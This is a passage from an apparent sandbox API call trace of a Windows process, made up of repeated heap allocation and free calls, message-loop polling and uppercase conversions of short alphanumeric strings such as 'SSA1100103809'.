hHeap=0x2af0000) returned 1 [0149.208] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780c0 [0149.208] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1e0 [0149.208] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa108 [0149.208] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72528 [0149.208] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78200 [0149.208] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0a8 [0149.208] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72558 [0149.208] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0a8 | out: hHeap=0x2af0000) returned 1 [0149.208] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f80 [0149.208] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa198 [0149.208] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa078 [0149.208] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a780c0 | out: hHeap=0x2af0000) returned 1 [0149.208] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72508 | out: hHeap=0x2af0000) returned 1 [0149.208] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1e0 | out: hHeap=0x2af0000) returned 1 [0149.208] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0149.208] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1e0 [0149.208] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72508 [0149.208] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1e0 | out: hHeap=0x2af0000) returned 1 [0149.208] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ff8 [0149.208] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa150 [0149.209] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa090 [0149.209] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72578 [0149.209] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78048 [0149.209] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0a8 [0149.209] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72698 [0149.209] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0a8 | out: hHeap=0x2af0000) returned 1 [0149.209] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78070 [0149.209] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0a8 [0149.209] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0d8 [0149.209] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ff8 | out: hHeap=0x2af0000) returned 1 [0149.209] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72508 | out: hHeap=0x2af0000) returned 1 [0149.209] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa150 | out: hHeap=0x2af0000) returned 1 [0149.209] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0149.209] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa150 [0149.209] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72508 [0149.209] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa150 | out: hHeap=0x2af0000) returned 1 [0149.209] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78228 [0149.209] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa150 [0149.209] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1b0 [0149.209] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72648 [0149.209] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781d8 [0149.209] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1c8 [0149.209] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72628 [0149.209] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1c8 | out: hHeap=0x2af0000) returned 1 [0149.209] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78318 [0149.209] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1c8 [0149.209] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1e0 [0149.209] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78228 | out: hHeap=0x2af0000) returned 1 [0149.209] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72508 | out: hHeap=0x2af0000) returned 1 [0149.210] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa150 | out: hHeap=0x2af0000) returned 1 [0149.210] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0149.210] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa150 [0149.210] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72508 [0149.210] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa150 | out: hHeap=0x2af0000) returned 1 [0149.210] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78160 [0149.210] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa150 [0149.210] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1f8 [0149.210] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72708 [0149.210] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ff8 [0149.210] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa210 [0149.210] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72718 [0149.210] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa210 | out: hHeap=0x2af0000) returned 1 [0149.210] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78228 [0149.210] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa210 [0149.210] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa228 [0149.210] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78160 | out: hHeap=0x2af0000) returned 1 [0149.210] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72508 | out: hHeap=0x2af0000) returned 1 [0149.210] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa150 | out: hHeap=0x2af0000) returned 1 [0149.210] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0149.210] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa150 [0149.210] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72508 [0149.210] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa150 | out: hHeap=0x2af0000) returned 1 [0149.210] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78250 [0149.210] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa150 [0149.210] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f40 [0149.210] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72748 [0149.210] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78278 [0149.210] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f58 [0149.210] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a68 [0149.211] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f58 | out: hHeap=0x2af0000) returned 1 [0149.211] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78340 [0149.211] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f58 [0149.211] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa468 [0149.211] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78250 | out: hHeap=0x2af0000) returned 1 [0149.211] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72508 | out: hHeap=0x2af0000) returned 1 [0149.211] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa150 | out: hHeap=0x2af0000) returned 1 [0149.211] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0149.211] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78098 [0149.211] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72508 [0149.211] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0149.211] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78098 | out: hHeap=0x2af0000) returned 1 [0149.211] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72508 | out: hHeap=0x2af0000) returned 1 [0149.211] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa150 [0149.211] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0149.211] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0149.211] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72508 [0149.211] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b98 [0149.211] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa348 [0149.211] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa3a8 [0149.211] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719b8 [0149.211] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa2e8 [0149.211] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0149.211] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a98 [0149.211] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783b8 [0149.211] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0149.211] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a783b8 | out: hHeap=0x2af0000) returned 1 [0149.211] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0149.211] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa2e8 | out: hHeap=0x2af0000) returned 1 [0149.211] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa3a8 | out: hHeap=0x2af0000) returned 1 [0149.212] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa348 | out: hHeap=0x2af0000) returned 1 [0149.212] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0149.212] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72508 | out: hHeap=0x2af0000) returned 1 [0149.212] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ecc0 [0149.212] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0149.212] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ecc0 | out: hHeap=0x2af0000) returned 1 [0149.212] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0149.212] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72508 [0149.212] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78098 [0149.212] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b98 [0149.212] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0149.212] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78098 | out: hHeap=0x2af0000) returned 1 [0149.212] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0149.212] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa4c8 [0149.212] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a73c98 [0149.212] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0149.212] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a28 [0149.212] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ab8 [0149.212] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa480 [0149.212] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa390 [0149.212] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b18 [0149.212] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa3f0 [0149.212] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0149.212] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71aa8 [0149.212] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78250 [0149.212] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0149.212] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78250 | out: hHeap=0x2af0000) returned 1 [0149.212] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0149.212] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa3f0 | out: hHeap=0x2af0000) returned 1 [0149.212] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa390 | out: hHeap=0x2af0000) returned 1 [0149.213] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa480 | out: hHeap=0x2af0000) returned 1 [0149.213] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0149.213] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0149.213] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e680 [0149.213] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0149.213] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e680 | out: hHeap=0x2af0000) returned 1 [0149.213] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0149.213] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719d8 [0149.213] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719c8 [0149.213] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa450 [0149.213] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa2d0 [0149.213] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719e8 [0149.213] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa480 [0149.213] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0149.213] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa480 | out: hHeap=0x2af0000) returned 1 [0149.213] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa2d0 | out: hHeap=0x2af0000) returned 1 [0149.213] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa450 | out: hHeap=0x2af0000) returned 1 [0149.213] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0149.213] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0149.213] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73c98 | out: hHeap=0x2af0000) returned 1 [0149.213] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa4c8 | out: hHeap=0x2af0000) returned 1 [0149.213] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b98 [0149.213] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6f00 [0149.213] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa258 [0149.213] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa4b0 [0149.213] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a88 [0149.213] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa2d0 [0149.213] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0149.213] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa2d0 | out: hHeap=0x2af0000) returned 1 [0149.213] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa4b0 | out: hHeap=0x2af0000) returned 1 [0149.214] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa258 | out: hHeap=0x2af0000) returned 1 [0149.214] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f00 | out: hHeap=0x2af0000) returned 1 [0149.214] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0149.214] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72508 | out: hHeap=0x2af0000) returned 1 [0149.214] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e880 [0149.214] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0149.214] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e880 | out: hHeap=0x2af0000) returned 1 [0149.214] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0149.214] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78368 [0149.214] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72508 [0149.214] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0149.214] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78368 | out: hHeap=0x2af0000) returned 1 [0149.214] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72508 | out: hHeap=0x2af0000) returned 1 [0149.214] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa3c0 [0149.214] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a73a10 [0149.214] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0149.214] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72508 [0149.214] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a18 [0149.214] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa300 [0149.214] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa2a0 [0149.214] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ae8 [0149.214] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa3d8 [0149.214] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0149.214] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719a8 [0149.214] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78098 [0149.214] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0149.214] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78098 | out: hHeap=0x2af0000) returned 1 [0149.214] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0149.214] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa3d8 | out: hHeap=0x2af0000) returned 1 [0149.214] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa2a0 | out: hHeap=0x2af0000) returned 1 [0149.214] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa300 | out: hHeap=0x2af0000) returned 1 [0149.215] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0149.215] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72508 | out: hHeap=0x2af0000) returned 1 [0149.215] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e700 [0149.215] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0149.215] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e700 | out: hHeap=0x2af0000) returned 1 [0149.215] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0149.215] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72508 [0149.215] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa240 [0149.215] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa510 [0149.215] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ad8 [0149.215] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0149.215] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa450 | out: hHeap=0x2af0000) returned 1 [0149.215] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa510 | out: hHeap=0x2af0000) returned 1 [0149.215] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa240 | out: hHeap=0x2af0000) returned 1 [0149.215] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72508 | out: hHeap=0x2af0000) returned 1 [0149.215] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0149.215] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa300 | out: hHeap=0x2af0000) returned 1 [0149.215] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa258 | out: hHeap=0x2af0000) returned 1 [0149.215] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa480 | out: hHeap=0x2af0000) returned 1 [0149.215] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72508 | out: hHeap=0x2af0000) returned 1 [0149.215] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0149.215] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73a10 | out: hHeap=0x2af0000) returned 1 [0149.215] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa3c0 | out: hHeap=0x2af0000) returned 1 [0149.215] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0149.215] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72508 | out: hHeap=0x2af0000) returned 1 [0149.215] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0149.215] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa150 | out: hHeap=0x2af0000) returned 1 [0149.215] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0149.216] PeekMessageW (in: 